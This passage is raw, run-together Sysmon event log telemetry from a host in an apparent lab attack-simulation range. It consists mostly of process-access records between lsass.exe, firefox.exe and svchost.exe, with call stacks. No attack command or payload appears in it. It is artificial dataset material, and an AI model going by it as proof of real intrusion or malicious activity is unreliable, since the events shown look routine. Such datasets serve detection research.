Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043766Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.213{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043765Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.213{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043764Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.212{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043763Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.212{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043762Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.212{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043761Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.212{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043760Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.210{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043759Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.210{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043758Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.210{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043757Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.210{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043756Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.210{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043755Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.210{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043754Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.210{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043753Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x800000000000000043752Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:23:00.195{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\chrome.3240.7.198582643C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043751Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-E4A2-63C7-4806-00000000AF02}32405364C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e77459|C:\Program Files\Mozilla Firefox\xul.dll+e86462|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+1a94a5b|C:\Program Files\Mozilla Firefox\xul.dll+1a9651a|C:\Program Files\Mozilla Firefox\xul.dll+17e5104|C:\Program Files\Mozilla Firefox\xul.dll+1ac0339|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+16d888|C:\Program Files\Mozilla Firefox\xul.dll+16c717|C:\Program Files\Mozilla Firefox\xul.dll+46b6cd1|C:\Program Files\Mozilla Firefox\xul.dll+472a2ec|C:\Program Files\Mozilla Firefox\xul.dll+472b10d|C:\Program Files\Mozilla Firefox\xul.dll+20599f2|C:\Program Files\Mozilla Firefox\firefox.exe+1e99e|C:\Program Files\Mozilla Firefox\firefox.exe+2c9f8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043750Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-E4A2-63C7-4806-00000000AF02}32405364C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e77459|C:\Program Files\Mozilla Firefox\xul.dll+e86462|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+1a94a5b|C:\Program Files\Mozilla Firefox\xul.dll+1a93e85|C:\Program Files\Mozilla Firefox\xul.dll+1a968e2|C:\Program Files\Mozilla Firefox\xul.dll+17e5104|C:\Program Files\Mozilla Firefox\xul.dll+1ac03d9|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+16d888|C:\Program Files\Mozilla Firefox\xul.dll+16c717|C:\Program Files\Mozilla Firefox\xul.dll+46b6cd1|C:\Program Files\Mozilla Firefox\xul.dll+472a2ec|C:\Program Files\Mozilla Firefox\xul.dll+472b10d|C:\Program Files\Mozilla Firefox\xul.dll+20599f2|C:\Program Files\Mozilla Firefox\firefox.exe+1e99e|C:\Program Files\Mozilla Firefox\firefox.exe+2c9f8|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000043749Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406744C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+9e834a|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+2581e76|C:\Program Files\Mozilla Firefox\xul.dll+1ab508d|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043748Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406744C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+9e834a|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+2581e76|C:\Program Files\Mozilla Firefox\xul.dll+1ab508d|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043747Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\pending_pings\5bb6dd64-d502-4946-8736-192e6b6053aeMD5=183A45C0CB756206A3AB0D015F2F47E9,SHA256=CD8D93A331DB54D6182FF8B93FBC8466C179BE3FE0C7FFDB61E322D241268675,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043746Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043745Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043744Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043743Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 